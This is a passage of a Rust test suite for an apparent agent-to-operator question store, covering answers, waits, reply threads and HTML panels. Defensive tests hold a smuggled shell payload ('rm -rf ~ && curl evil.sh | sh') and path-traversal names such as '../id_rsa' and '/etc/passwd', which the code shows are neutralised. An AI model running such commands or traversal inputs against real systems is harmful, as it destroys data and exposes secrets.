1763        let (_dir, store) = store();
1764        let mut q = choice_question();
1765        store.put(&mut q).unwrap();
1766
1767        // `Blocked` can still be resumed - leave it exactly as it was.
1768        let n = store.settle_run(&q.run, RunStatus::Blocked).unwrap();
1769        assert_eq!(n, 0);
1770        assert!(store.get(&q.id).unwrap().status.open());
1771
1772        // `Failed` is not - abandon it, with the run and its fate in the
1773        // reason so the owner can tell what happened without a run to read.
1774        let n = store.settle_run(&q.run, RunStatus::Failed).unwrap();
1775        assert_eq!(n, 1);
1776        let back = store.get(&q.id).unwrap();
1777        assert!(!back.status.open());
1778        assert!(back.detail.contains(&q.run) && back.detail.contains("failed"));
1779
1780        // A second call against the same, now-settled run finds nothing left.
1781        assert_eq!(store.settle_run(&q.run, RunStatus::Failed).unwrap(), 0);
1782    }
1783
1784    fn choice_question() -> Question {
1785        Question::new(
1786            "20260902-201256-9fb7".to_owned(),
1787            "implement".to_owned(),
1788            "impl-A".to_owned(),
1789            "Which storage backend should the cache use?".to_owned(),
1790            "Both are already dependencies.".to_owned(),
1791            vec!["SQLite".to_owned(), "Redis".to_owned()],
1792        )
1793    }
1794
1795    fn free_question() -> Question {
1796        Question::new(
1797            "20260902-201256-9fb7".to_owned(),
1798            "review".to_owned(),
1799            "rev-1".to_owned(),
1800            "What should the error message say?".to_owned(),
1801            String::new(),
1802            Vec::new(),
1803        )
1804    }
1805
1806    /// No notification, which is the default and what most of these want.
1807    fn quiet() -> config::Notify {
1808        config::Notify::default()
1809    }
1810
1811    #[test]
1812    fn the_stored_json_is_the_shape_the_web_ui_was_written_against() {
1813        // The front end parses these names by hand; there is no shared schema
1814        // and no compiler between the two. A rename here is a UI that shows an
1815        // empty card and reports no error, so the names are asserted literally.
1816        let mut q = choice_question();
1817        q.id = "20260902-231501-ab12".to_owned();
1818        let open: serde_json::Value = serde_json::to_value(&q).unwrap();
1819        // `serde_json::Value` holds an object's keys sorted, and key order
1820        // means nothing to a JSON reader anyway: the field *set* is what the
1821        // front end was written against, so that is what is pinned here.
1822        let keys: Vec<&str> = open
1823            .as_object()
1824            .unwrap()
1825            .keys()
1826            .map(String::as_str)
1827            .collect();
1828        assert_eq!(
1829            keys,
1830            [
1831                "actions",
1832                "answer",
1833                "answer_delivered",
1834                "answer_timeout",
1835                "answered_at",
1836                "asked_at",
1837                "assets",
1838                "choices",
1839                "cwd",
1840                "delivered_turns",
1841                "detail",
1842                "id",
1843                "node",
1844                "panel",
1845                "run",
1846                "schema",
1847                "seat",
1848                "status",
1849                "summary",
1850                "thread",
1851                "waiter",
1852            ],
1853            "the on-disk field set is a contract with the front end"
1854        );
1855        assert_eq!(open["schema"], 4);
1856        assert_eq!(open["thread"], serde_json::json!([]));
1857        assert_eq!(open["id"], "20260902-231501-ab12");
1858        assert_eq!(open["run"], "20260902-201256-9fb7");
1859        assert_eq!(open["node"], "implement");
1860        assert_eq!(open["seat"], "impl-A");
1861        assert_eq!(open["status"], "open");
1862        assert_eq!(open["choices"], serde_json::json!(["SQLite", "Redis"]));
1863        assert_eq!(open["answered_at"], serde_json::Value::Null);
1864        assert_eq!(open["answer"], serde_json::Value::Null);
1865        let asked = open["asked_at"].as_str().unwrap();
1866        assert!(
1867            asked.ends_with('Z') && asked.contains('T'),
1868            "timestamps are UTC RFC 3339, which is what `new Date()` parses: {asked}"
1869        );
1870
1871        // A chosen option, exactly as the contract spells it.
1872        q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
1873        let answered = serde_json::to_value(&q).unwrap();
1874        assert_eq!(answered["status"], "answered");
1875        assert_eq!(answered["answer"], serde_json::json!({"choice": "SQLite"}));
1876        assert!(answered["answered_at"].is_string());
1877
1878        // And free text, which is the other of the two forms.
1879        let mut free = free_question();
1880        free.answer(Answer::Text("Say which file it was".to_owned()))
1881            .unwrap();
1882        assert_eq!(
1883            serde_json::to_value(&free).unwrap()["answer"],
1884            serde_json::json!({"text": "Say which file it was"})
1885        );
1886
1887        // And it survives the round trip a reader actually performs.
1888        let body = serde_json::to_string(&q).unwrap();
1889        assert_eq!(serde_json::from_str::<Question>(&body).unwrap(), q);
1890    }
1891
1892    #[test]
1893    fn an_answer_the_question_never_offered_is_refused_with_its_own_reason() {
1894        // Four different mistakes, four different fixes: the web handler shows
1895        // these strings to the person who made them.
1896        let mut unoffered = choice_question();
1897        let a = unoffered
1898            .answer(Answer::Choice("Postgres".to_owned()))
1899            .unwrap_err()
1900            .to_string();
1901
1902        let mut typed = choice_question();
1903        let b = typed
1904            .answer(Answer::Text("use Postgres".to_owned()))
1905            .unwrap_err()
1906            .to_string();
1907
1908        let mut blank = free_question();
1909        let c = blank
1910            .answer(Answer::Text("   \n".to_owned()))
1911            .unwrap_err()
1912            .to_string();
1913
1914        let mut twice = choice_question();
1915        twice.answer(Answer::Choice("SQLite".to_owned())).unwrap();
1916        let d = twice
1917            .answer(Answer::Choice("Redis".to_owned()))
1918            .unwrap_err()
1919            .to_string();
1920
1921        assert!(a.contains("not one of the choices"), "{a}");
1922        assert!(b.contains("multiple choice"), "{b}");
1923        assert!(c.contains("empty"), "{c}");
1924        assert!(d.contains("already answered"), "{d}");
1925        let mut distinct = vec![a, b, c, d];
1926        let asked = distinct.len();
1927        distinct.sort_unstable();
1928        distinct.dedup();
1929        assert_eq!(distinct.len(), asked, "each rejection is distinguishable");
1930
1931        // The refused ones are still open, so the owner can answer properly.
1932        assert_eq!(unoffered.status, QuestionStatus::Open);
1933        assert_eq!(typed.status, QuestionStatus::Open);
1934        assert_eq!(blank.status, QuestionStatus::Open);
1935        // And the first answer to the double-answered one survived.
1936        assert_eq!(twice.resolution().as_deref(), Some("SQLite"));
1937
1938        // Free text refuses a fabricated choice for the mirror-image reason.
1939        let mut free = free_question();
1940        let e = free
1941            .answer(Answer::Choice("SQLite".to_owned()))
1942            .unwrap_err()
1943            .to_string();
1944        assert!(e.contains("free text"), "{e}");
1945    }
1946
1947    #[test]
1948    fn open_questions_are_listed_before_answered_ones() {
1949        let (_dir, s) = store();
1950        // Ids carry a timestamp, so force a known order: the answered one is
1951        // the newest, and must still sort below the open ones.
1952        let mut old_open = choice_question();
1953        old_open.id = "20260101-000001-aaaa".to_owned();
1954        let mut new_open = choice_question();
1955        new_open.id = "20260101-000002-bbbb".to_owned();
1956        let mut answered = choice_question();
1957        answered.id = "20260101-000003-cccc".to_owned();
1958        answered.answer(Answer::Choice("Redis".to_owned())).unwrap();
1959        for q in [&mut old_open, &mut new_open, &mut answered] {
1960            s.put(q).unwrap();
1961        }
1962
1963        let ids: Vec<String> = s.list().into_iter().map(|q| q.id).collect();
1964        assert_eq!(
1965            ids,
1966            [
1967                "20260101-000002-bbbb",
1968                "20260101-000001-aaaa",
1969                "20260101-000003-cccc"
1970            ],
1971            "what has stopped work comes first; history sorts underneath"
1972        );
1973        assert_eq!(s.count_open(), 2);
1974        assert_eq!(s.open_for("20260902-201256-9fb7").len(), 2);
1975        assert!(s.open_for("some-other-run").is_empty());
1976        // The short id is what the phone and the reports show.
1977        assert_eq!(s.resolve_id("bbbb").unwrap(), "20260101-000002-bbbb");
1978        assert!(s.get("20260101-000002-bbbb").is_ok());
1979        assert!(s.resolve_id("nope").is_err());
1980        assert!(
1981            s.revision() > 0,
1982            "the store's mtime drives the phone's polling"
1983        );
1984    }
1985
1986    #[test]
1987    fn a_question_file_magi_cannot_read_does_not_take_the_listing_down() {
1988        let (_dir, s) = store();
1989        let mut good = choice_question();
1990        s.put(&mut good).unwrap();
1991        // Truncated by a killed writer, and written by a magi from the future.
1992        std::fs::write(s.path_of("20260101-000009-dead"), "{\"schema\": 1, \"id\"").unwrap();
1993        let future = serde_json::json!({
1994            "schema": 99, "id": "20260101-000010-beef", "run": "r", "node": "n",
1995            "seat": "s", "summary": "?", "detail": "", "choices": [],
1996            "status": "open", "asked_at": "2026-01-01T00:00:00Z",
1997            "answered_at": null, "answer": null,
1998        });
1999        std::fs::write(
2000            s.path_of("20260101-000010-beef"),
2001            serde_json::to_string(&future).unwrap(),
2002        )
2003        .unwrap();
2004
2005        let listed = s.list();
2006        assert_eq!(listed.len(), 1, "one bad file must not hide the open one");
2007        assert_eq!(listed[0].id, good.id);
2008        // Asked for by name, the unreadable one explains itself instead.
2009        let e = s.get("20260101-000010-beef").unwrap_err().to_string();
2010        assert!(e.contains("schema"), "{e}");
2011    }
2012
2013    #[tokio::test]
2014    async fn the_wait_returns_the_answer_another_process_wrote() {
2015        // The phone, `magi answer` and this run are three processes with no
2016        // channel between them: the file is the channel, so the wait has to see
2017        // a write it did not make. Sub-second timings keep this a real wait
2018        // without a real one's duration.
2019        let (dir, s) = store();
2020        let mut q = choice_question();
2021        let id = q.id.clone();
2022        let writer = Questions::at(dir.path().join("questions"));
2023        let handle = tokio::spawn(async move {
2024            tokio::time::sleep(Duration::from_millis(30)).await;
2025            let mut fresh = writer.get(&id).expect("the question was filed first");
2026            fresh.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2027            writer.put(&mut fresh).unwrap();
2028        });
2029
2030        let got = wait_for_owner(
2031            &mut q,
2032            &s,
2033            &quiet(),
2034            Duration::from_secs(5),
2035            Duration::from_millis(10),
2036        )
2037        .await
2038        .unwrap();
2039
2040        handle.await.unwrap();
2041        assert_eq!(got, Wait::Answered("SQLite".to_owned()));
2042        assert_eq!(
2043            q.status,
2044            QuestionStatus::Answered,
2045            "the caller's copy is refreshed from the answering process's record"
2046        );
2047        assert!(q.answered_at.is_some());
2048    }
2049
2050    #[tokio::test]
2051    async fn a_question_nobody_answers_is_abandoned_not_deleted() {
2052        let (_dir, s) = store();
2053        let mut q = choice_question();
2054
2055        let got = wait_for_owner(
2056            &mut q,
2057            &s,
2058            &quiet(),
2059            Duration::from_millis(60),
2060            Duration::from_millis(10),
2061        )
2062        .await
2063        .unwrap();
2064
2065        assert_eq!(
2066            got,
2067            Wait::Abandoned,
2068            "a slow human is not an error; the run parks"
2069        );
2070        assert_eq!(q.status, QuestionStatus::Abandoned);
2071        let on_disk = s.get(&q.id).expect("the record of what was asked survives");
2072        assert_eq!(on_disk.status, QuestionStatus::Abandoned);
2073        assert!(
2074            on_disk.detail.contains("Abandoned:"),
2075            "why nobody answered belongs with the question: {}",
2076            on_disk.detail
2077        );
2078        assert!(on_disk.resolution().is_none());
2079        assert_eq!(s.count_open(), 0);
2080    }
2081
2082    #[tokio::test]
2083    async fn a_slice_running_out_leaves_the_question_open_rather_than_abandoning_it() {
2084        // This is the whole point of slicing: `timeout` (the real
2085        // `answer_timeout` budget) is far larger than `slice`, so the loop
2086        // must land on `slice` first and hand back `Pending` - not read the
2087        // silence so far as the owner having given up.
2088        let (_dir, s) = store();
2089        let mut q = choice_question();
2090        s.put(&mut q).unwrap();
2091
2092        let got = wait_loop(
2093            &mut q,
2094            &s,
2095            Duration::from_secs(3600),
2096            Duration::from_millis(30),
2097            Duration::from_millis(10),
2098        )
2099        .await
2100        .unwrap();
2101
2102        assert_eq!(
2103            got,
2104            Wait::Pending,
2105            "the clock on this call ran out, not the owner's patience"
2106        );
2107        assert_eq!(
2108            q.status,
2109            QuestionStatus::Open,
2110            "a slice expiring must never abandon the question"
2111        );
2112        let on_disk = s.get(&q.id).expect("still on disk, still open");
2113        assert_eq!(
2114            on_disk.status,
2115            QuestionStatus::Open,
2116            "nothing about the record changed just because this call gave up"
2117        );
2118    }
2119
2120    #[tokio::test]
2121    async fn a_wait_resumed_after_a_slice_sees_the_answer_the_first_slice_missed() {
2122        // The shape `magi ask --wait <id>` relies on: one slice finds nothing
2123        // and returns `Pending`, a second slice - a fresh call, exactly as a
2124        // fresh process would make - picks the same question back up and
2125        // sees an answer written in between.
2126        let (dir, s) = store();
2127        let mut q = choice_question();
2128        s.put(&mut q).unwrap();
2129
2130        let first = wait_loop(
2131            &mut q,
2132            &s,
2133            Duration::from_secs(3600),
2134            Duration::from_millis(30),
2135            Duration::from_millis(10),
2136        )
2137        .await
2138        .unwrap();
2139        assert_eq!(first, Wait::Pending);
2140
2141        let id = q.id.clone();
2142        let writer = Questions::at(dir.path().join("questions"));
2143        let mut fresh = writer.get(&id).unwrap();
2144        fresh.answer(Answer::Choice("Redis".to_owned())).unwrap();
2145        writer.put(&mut fresh).unwrap();
2146
2147        // `resume_wait` uses its own production poll interval rather than a
2148        // test-injected one, so the budget here only needs to be large enough
2149        // to cover one real poll tick - the point is that it is `resume_wait`
2150        // itself, not a helper, that finds the answer.
2151        let second = resume_wait(&mut q, &s, Duration::from_millis(500))
2152            .await
2153            .unwrap();
2154        assert_eq!(second, Wait::Answered("Redis".to_owned()));
2155        assert_eq!(q.status, QuestionStatus::Answered);
2156    }
2157
2158    #[tokio::test]
2159    async fn a_reply_left_in_the_gap_before_a_resumed_wait_starts_is_never_missed() {
2160        // The owner can speak back while nothing is running at all - between
2161        // one call reporting `Wait::Pending` and the next `--wait` picking
2162        // the question back up - and whoever resumes the wait loads a
2163        // *fresh* copy of the question off disk, one whose thread already
2164        // contains that reply. A baseline taken from that fresh copy would
2165        // treat the reply as pre-existing and never notice it "arrive",
2166        // leaving the agent polling in silence until `answer_timeout`
2167        // eventually abandons the question - replacing the exact accident
2168        // this feature exists to fix with a quieter version of itself.
2169        let (dir, s) = store();
2170        let mut q = choice_question();
2171        s.put(&mut q).unwrap();
2172
2173        let first = wait_loop(
2174            &mut q,
2175            &s,
2176            Duration::from_secs(3600),
2177            Duration::from_millis(30),
2178            Duration::from_millis(10),
2179        )
2180        .await
2181        .unwrap();
2182        assert_eq!(first, Wait::Pending);
2183
2184        // The owner speaks back during the gap, with nobody running yet.
2185        let id = q.id.clone();
2186        let writer = Questions::at(dir.path().join("questions"));
2187        let mut fresh = writer.get(&id).unwrap();
2188        fresh.say("why not Postgres?").unwrap();
2189        writer.put(&mut fresh).unwrap();
2190
2191        // `magi ask --wait` re-reads the question rather than reusing the
2192        // stale in-memory copy the earlier call held - so the copy handed to
2193        // `resume_wait` here already carries the reply, same as `fresh` above.
2194        let mut resumed = s.get(&id).unwrap();
2195        let second = resume_wait(&mut resumed, &s, Duration::from_millis(500))
2196            .await
2197            .unwrap();
2198        assert_eq!(second, Wait::Replied("why not Postgres?".to_owned()));
2199        assert_eq!(
2200            resumed.status,
2201            QuestionStatus::Open,
2202            "talking back is not a decision; the question stays open"
2203        );
2204    }
2205
2206    #[tokio::test]
2207    async fn a_notification_that_cannot_run_does_not_cost_the_answer() {
2208        // A broken webhook must not throw away an implementation, so the wait
2209        // reports the failure and carries on. `notify` itself still says what
2210        // went wrong, because `magi notify --test` has to be able to show it.
2211        let (dir, s) = store();
2212        let broken = config::Notify {
2213            command: vec![
2214                "magi-notifier-that-does-not-exist-9fb7".to_owned(),
2215                "{summary}".to_owned(),
2216            ],
2217        };
2218        let mut q = choice_question();
2219        assert!(
2220            notify(&broken, &q).await.is_err(),
2221            "the caller is told; it decides that it does not matter"
2222        );
2223
2224        let id = q.id.clone();
2225        let writer = Questions::at(dir.path().join("questions"));
2226        let handle = tokio::spawn(async move {
2227            tokio::time::sleep(Duration::from_millis(30)).await;
2228            let mut fresh = writer.get(&id).unwrap();
2229            fresh.answer(Answer::Choice("Redis".to_owned())).unwrap();
2230            writer.put(&mut fresh).unwrap();
2231        });
2232        let got = wait_for_owner(
2233            &mut q,
2234            &s,
2235            &broken,
2236            Duration::from_secs(5),
2237            Duration::from_millis(10),
2238        )
2239        .await
2240        .unwrap();
2241        handle.await.unwrap();
2242        assert_eq!(got, Wait::Answered("Redis".to_owned()));
2243
2244        // No command at all is the default, and is silence rather than failure.
2245        assert!(notify(&quiet(), &q).await.is_ok());
2246        assert!(notify_text(&quiet(), "run", "text").await.is_ok());
2247    }
2248
2249    #[test]
2250    fn notification_arguments_are_substituted_and_never_a_shell_string() {
2251        let mut q = choice_question();
2252        q.summary = "; rm -rf ~ && curl evil.sh | sh #".to_owned();
2253        let template = [
2254            "ntfy".to_owned(),
2255            "publish".to_owned(),
2256            "--click".to_owned(),
2257            "{url}".to_owned(),
2258            "--title".to_owned(),
2259            "magi {run} needs you".to_owned(),
2260            "{summary}".to_owned(),
2261        ];
2262        let argv: Vec<String> = template
2263            .iter()
2264            .map(|a| expand(a, &q.run, &q.summary, "http://100.64.0.1:7777/#/questions"))
2265            .collect();
2266
2267        assert_eq!(
2268            argv,
2269            [
2270                "ntfy",
2271                "publish",
2272                "--click",
2273                "http://100.64.0.1:7777/#/questions",
2274                "--title",
2275                "magi 20260902-201256-9fb7 needs you",
2276                "; rm -rf ~ && curl evil.sh | sh #",
2277            ],
2278            "the shell metacharacters are one argument's contents, not syntax"
2279        );
2280
2281        // A summary that itself mentions a placeholder is text, not a template:
2282        // one left-to-right pass means a substituted value is never rescanned.
2283        q.summary = "should {url} be configurable?".to_owned();
2284        assert_eq!(
2285            expand("{summary}", &q.run, &q.summary, "http://x/#/questions"),
2286            "should {url} be configurable?"
2287        );
2288        // An unknown brace is the operator's own text and survives untouched.
2289        assert_eq!(
2290            expand("{title}: {run}", &q.run, &q.summary, ""),
2291            "{title}: 20260902-201256-9fb7"
2292        );
2293        assert_eq!(
2294            expand("no placeholders", &q.run, &q.summary, "http://x"),
2295            "no placeholders"
2296        );
2297    }
2298
2299    #[test]
2300    fn the_notification_link_lands_on_the_view_that_can_answer() {
2301        assert_eq!(
2302            question_url("http://100.64.0.1:7777"),
2303            "http://100.64.0.1:7777/#/questions"
2304        );
2305        assert_eq!(
2306            question_url("http://100.64.0.1:7777/"),
2307            "http://100.64.0.1:7777/#/questions"
2308        );
2309        // An operator who wrote a fragment has said where they want to land.
2310        assert_eq!(
2311            question_url("http://magi.ts.net/#/runs"),
2312            "http://magi.ts.net/#/runs"
2313        );
2314        // Unset expands to nothing rather than to a guessed address.
2315        assert_eq!(question_url("  "), "");
2316    }
2317
2318    /// A question with a fixed id, so a panel's path on disk is predictable.
2319    fn panelled() -> Question {
2320        let mut q = choice_question();
2321        q.id = "20260903-014455-ab12".to_owned();
2322        q
2323    }
2324
2325    #[test]
2326    fn a_panel_round_trips_verbatim_with_its_assets_listed_sorted() {
2327        let (dir, s) = store();
2328        let work = dir.path().join("worktree");
2329        std::fs::create_dir_all(&work).unwrap();
2330        std::fs::write(work.join("diff.svg"), "<svg/>").unwrap();
2331        std::fs::write(work.join("table.png"), b"\x89PNG").unwrap();
2332
2333        let mut q = panelled();
2334        let html = "<h1>Merge?</h1>\n<img src=\"asset/diff.svg\">\n";
2335        s.put_panel(
2336            &mut q,
2337            html,
2338            &[work.join("table.png"), work.join("diff.svg")],
2339        )
2340        .unwrap();
2341        s.put(&mut q).unwrap();
2342
2343        assert!(q.panel);
2344        assert_eq!(
2345            q.assets,
2346            ["diff.svg", "table.png"],
2347            "sorted, not in the order the agent happened to pass them"
2348        );
2349        assert_eq!(
2350            s.panel_html(&q.id).as_deref(),
2351            Some(html),
2352            "the html is stored byte for byte; the agent authored the markup"
2353        );
2354        assert_eq!(
2355            s.panel_asset(&q.id, "diff.svg").unwrap().as_deref(),
2356            Some(&b"<svg/>"[..])
2357        );
2358
2359        // The record on disk carries the same two fields the front end reads.
2360        let body = std::fs::read_to_string(s.path_of(&q.id)).unwrap();
2361        let json: serde_json::Value = serde_json::from_str(&body).unwrap();
2362        assert_eq!(json["panel"], true);
2363        assert_eq!(json["assets"], serde_json::json!(["diff.svg", "table.png"]));
2364        let back = s.get(&q.id).unwrap();
2365        assert!(back.panel);
2366        assert_eq!(back.assets, q.assets);
2367
2368        // The assets were copied, so the panel still renders after `magi fold`
2369        // has deleted the candidate worktree the agent authored it in.
2370        std::fs::remove_dir_all(&work).unwrap();
2371        assert_eq!(
2372            s.panel_asset(&q.id, "table.png").unwrap().as_deref(),
2373            Some(&b"\x89PNG"[..]),
2374            "a referenced asset would be gone with the worktree"
2375        );
2376    }
2377
2378    #[test]
2379    fn a_traversal_asset_name_is_refused_before_the_filesystem_is_touched() {
2380        let (dir, s) = store();
2381        let mut q = panelled();
2382        s.put_panel(&mut q, "<p>ok</p>", &[]).unwrap();
2383        s.put(&mut q).unwrap();
2384
2385        // A file exactly one level up from the panel directory - which is
2386        // where `..` lands - holding content a read would make visible.
2387        let secret = "this must never reach the browser";
2388        std::fs::write(s.root().join("id_rsa"), secret).unwrap();
2389        assert_eq!(
2390            std::fs::read_to_string(s.panel_dir(&q.id).join("../id_rsa")).unwrap(),
2391            secret,
2392            "the traversal is real: the operating system resolves this path \
2393             happily, which is why the name has to be refused before the join"
2394        );
2395
2396        let long = "x".repeat(200);
2397        for name in [
2398            "..",
2399            "../id_rsa",
2400            "..\\id_rsa",
2401            "sub/../id_rsa",
2402            "/",
2403            "\\",
2404            "/etc/passwd",
2405            "C:\\Windows\\win.ini",
2406            "",
2407            ".hidden",
2408            ".",
2409            long.as_str(),
2410        ] {
2411            assert!(!valid_asset_name(name), "`{name}` must fail the pattern");
2412            let e = s.panel_asset(&q.id, name).unwrap_err().to_string();
2413            assert!(
2414                e.contains("not a panel file name"),
2415                "`{name}` must be refused as a name, not attempted: {e}"
2416            );
2417            assert!(!e.contains(secret), "`{name}` reached the filesystem: {e}");
2418        }
2419        // A name that is allowed still finds its file, so the refusals above
2420        // were the rule at work and not a store that reads nothing.
2421        assert!(s.panel_asset(&q.id, "index.html").unwrap().is_some());
2422
2423        // The same rule on the write side, where the name comes from a source
2424        // file's base name, and a refusal leaves the stored panel untouched.
2425        let hidden = dir.path().join(".hidden");
2426        std::fs::write(&hidden, "x").unwrap();
2427        let e = s
2428            .put_panel(&mut q, "<p>replacement</p>", &[hidden])
2429            .unwrap_err()
2430            .to_string();
2431        assert!(e.contains(".hidden") && e.contains("A-Za-z0-9"), "{e}");
2432        assert_eq!(s.panel_html(&q.id).as_deref(), Some("<p>ok</p>"));
2433        assert!(q.assets.is_empty());
2434    }
2435
2436    #[test]
2437    fn the_panel_size_cap_refuses_an_oversized_asset_set_and_writes_nothing() {
2438        let (dir, s) = store();
2439        let mut q = panelled();
2440        s.put(&mut q).unwrap();
2441
2442        // Sized rather than filled: the cap reads the file's length, and a
2443        // test that actually produced eight mebibytes would only be slower.
2444        let big = dir.path().join("recording.png");
2445        std::fs::File::create(&big)
2446            .unwrap()
2447            .set_len(PANEL_MAX_BYTES)
2448            .unwrap();
2449
2450        let html = "<p>see the recording</p>";
2451        let total = PANEL_MAX_BYTES + html.len() as u64;
2452        let e = s.put_panel(&mut q, html, &[big]).unwrap_err().to_string();
2453        assert!(
2454            e.contains(&PANEL_MAX_BYTES.to_string()),
2455            "the cap is named so the agent knows the limit: {e}"
2456        );
2457        assert!(
2458            e.contains(&total.to_string()),
2459            "the actual size is named so the agent knows by how much: {e}"
2460        );
2461
2462        assert!(!q.panel);
2463        assert!(q.assets.is_empty());
2464        let left: Vec<String> = std::fs::read_dir(s.root())
2465            .unwrap()
2466            .map(|e| e.unwrap().file_name().to_string_lossy().into_owned())
2467            .collect();
2468        assert_eq!(
2469            left,
2470            [format!("{}.json", q.id)],
2471            "a refused panel leaves neither a directory nor scratch: {left:?}"
2472        );
2473    }
2474
2475    #[test]
2476    fn two_assets_sharing_a_base_name_are_refused_rather_than_one_hiding_the_other() {
2477        let (dir, s) = store();
2478        let (before, after) = (dir.path().join("before"), dir.path().join("after"));
2479        std::fs::create_dir_all(&before).unwrap();
2480        std::fs::create_dir_all(&after).unwrap();
2481        std::fs::write(before.join("diff.png"), "before").unwrap();
2482        std::fs::write(after.join("diff.png"), "after").unwrap();
2483
2484        let mut q = panelled();
2485        let e = s
2486            .put_panel(
2487                &mut q,
2488                "<p>x</p>",
2489                &[before.join("diff.png"), after.join("diff.png")],
2490            )
2491            .unwrap_err()
2492            .to_string();
2493        assert!(e.contains("diff.png"), "{e}");
2494        assert!(
2495            e.contains("before") && e.contains("after"),
2496            "both sources are named, because the fix is to rename one: {e}"
2497        );
2498        assert!(!q.panel);
2499        assert!(!s.panel_dir(&q.id).exists());
2500    }
2501
2502    #[test]
2503    fn storing_a_panel_twice_replaces_it_rather_than_merging_two_attempts() {
2504        let (dir, s) = store();
2505        std::fs::write(dir.path().join("old.png"), "old").unwrap();
2506        std::fs::write(dir.path().join("new.png"), "new").unwrap();
2507
2508        let mut q = panelled();
2509        s.put_panel(&mut q, "<p>first</p>", &[dir.path().join("old.png")])
2510            .unwrap();
2511        s.put_panel(&mut q, "<p>second</p>", &[dir.path().join("new.png")])
2512            .unwrap();
2513
2514        assert_eq!(q.assets, ["new.png"]);
2515        assert_eq!(s.panel_html(&q.id).as_deref(), Some("<p>second</p>"));
2516        assert!(
2517            s.panel_asset(&q.id, "old.png").unwrap().is_none(),
2518            "an asset from the first attempt would show a mix of two answers"
2519        );
2520
2521        s.drop_panel(&q.id).unwrap();
2522        assert!(s.panel_html(&q.id).is_none());
2523        assert!(!s.panel_dir(&q.id).exists());
2524        s.drop_panel(&q.id)
2525            .expect("dropping a panel that is already gone is the desired state");
2526    }
2527
2528    #[test]
2529    fn a_question_with_no_panel_reports_none_rather_than_an_error() {
2530        let (_dir, s) = store();
2531        let mut q = panelled();
2532        s.put(&mut q).unwrap();
2533
2534        assert!(!q.panel);
2535        assert!(s.panel_html(&q.id).is_none());
2536        assert!(
2537            s.panel_asset(&q.id, "diff.svg").unwrap().is_none(),
2538            "a missing file is a 404 for the caller, not a failure of the store"
2539        );
2540        let json = serde_json::to_value(&q).unwrap();
2541        assert_eq!(json["panel"], false);
2542        assert_eq!(json["assets"], serde_json::json!([]));
2543
2544        // And an empty panel is refused, because an empty frame reads to the
2545        // owner as "the agent had nothing to say".
2546        let e = s.put_panel(&mut q, "  \n", &[]).unwrap_err().to_string();
2547        assert!(e.contains("empty panel"), "{e}");
2548        assert!(!s.panel_dir(&q.id).exists());
2549    }
2550
2551    #[test]
2552    fn a_question_written_before_panels_existed_still_deserialises() {
2553        let (_dir, s) = store();
2554        std::fs::create_dir_all(s.root()).unwrap();
2555        let id = "20260902-231501-ab12";
2556        // Byte for byte what an older magi wrote: no `panel`, no `assets`.
2557        let body = r#"{
2558  "schema": 1,
2559  "id": "20260902-231501-ab12",
2560  "run": "20260902-201256-9fb7",
2561  "node": "implement",
2562  "seat": "impl-A",
2563  "summary": "Which storage backend should the cache use?",
2564  "detail": "Both are already dependencies.",
2565  "choices": ["SQLite", "Redis"],
2566  "status": "open",
2567  "asked_at": "2026-09-02T23:15:01Z",
2568  "answered_at": null,
2569  "answer": null
2570}"#;
2571        std::fs::write(s.path_of(id), body).unwrap();
2572
2573        let q = s.get(id).unwrap();
2574        assert!(
2575            !q.panel,
2576            "an absent field means no panel, not a parse error"
2577        );
2578        assert!(q.assets.is_empty());
2579        // Schema 1 predates `thread` entirely - not merely predates it having
2580        // any turns - and this build now speaks schema 3. Reading it must not
2581        // be an error: `q.schema > SCHEMA` is false for 1 > 3, so the file is
2582        // accepted and the missing field defaults to no conversation yet.
2583        assert_eq!(q.schema, 1);
2584        assert!(q.thread.is_empty());
2585        assert_eq!(
2586            q.answer_timeout, 0,
2587            "an absent field means unrecorded, not a zero-second deadline"
2588        );
2589        assert!(!q.waiting_on_agent());
2590        assert_eq!(q.summary, "Which storage backend should the cache use?");
2591        assert_eq!(
2592            s.list().len(),
2593            1,
2594            "and it is still listed; skipping it would hide an open question"
2595        );
2596    }
2597
2598    fn turn(who: Who, body: &str, at: Timestamp) -> Turn {
2599        Turn {
2600            who,
2601            body: body.to_owned(),
2602            at,
2603        }
2604    }
2605
2606    #[test]
2607    fn a_turn_round_trips_as_who_body_at_with_two_named_speakers() {
2608        // The phone reads this shape by hand, same as the question itself: a
2609        // rename here is a card that silently drops every message in it.
2610        let mut q = choice_question();
2611        q.thread
2612            .push(turn(Who::Operator, "why not Postgres?", Timestamp::now()));
2613        let value = serde_json::to_value(&q.thread[0]).unwrap();
2614        let mut keys: Vec<&str> = value
2615            .as_object()
2616            .unwrap()
2617            .keys()
2618            .map(String::as_str)
2619            .collect();
2620        keys.sort_unstable();
2621        assert_eq!(keys, ["at", "body", "who"]);
2622        assert_eq!(value["who"], "operator");
2623        assert_eq!(value["body"], "why not Postgres?");
2624
2625        let agent_turn = serde_json::json!({"who": "agent", "body": "hi", "at": value["at"]});
2626        let parsed: Turn = serde_json::from_value(agent_turn).unwrap();
2627        assert_eq!(parsed.who, Who::Agent);
2628    }
2629
2630    #[test]
2631    fn saying_something_appends_an_operator_turn_without_deciding_anything() {
2632        let mut q = choice_question();
2633        q.say("does the cache need eviction?").unwrap();
2634        assert_eq!(q.thread.len(), 1);
2635        assert_eq!(q.thread[0].who, Who::Operator);
2636        assert_eq!(q.thread[0].body, "does the cache need eviction?");
2637        // Speaking is not deciding: the status and the answer are untouched,
2638        // which is the whole point of the round trip existing at all.
2639        assert_eq!(q.status, QuestionStatus::Open);
2640        assert!(q.answer.is_none());
2641        assert!(q.waiting_on_agent(), "the ball is now in the agent's court");
2642    }
2643
2644    #[test]
2645    fn saying_and_replying_are_refused_on_a_settled_question_and_on_empty_text() {
2646        let mut answered = choice_question();
2647        answered
2648            .answer(Answer::Choice("SQLite".to_owned()))
2649            .unwrap();
2650        let a = answered.say("still there?").unwrap_err().to_string();
2651        assert!(a.contains("already answered"), "{a}");
2652        let b = answered
2653            .reply("still there?", vec![])
2654            .unwrap_err()
2655            .to_string();
2656        assert!(b.contains("already answered"), "{b}");
2657
2658        let mut abandoned = choice_question();
2659        abandoned.abandon("timed out");
2660        let c = abandoned.say("hello?").unwrap_err().to_string();
2661        assert!(c.contains("abandoned"), "{c}");
2662
2663        let mut open = choice_question();
2664        let d = open.say("   ").unwrap_err().to_string();
2665        assert!(d.contains("empty"), "{d}");
2666        let e = open.reply("  \n", vec![]).unwrap_err().to_string();
2667        assert!(e.contains("empty"), "{e}");
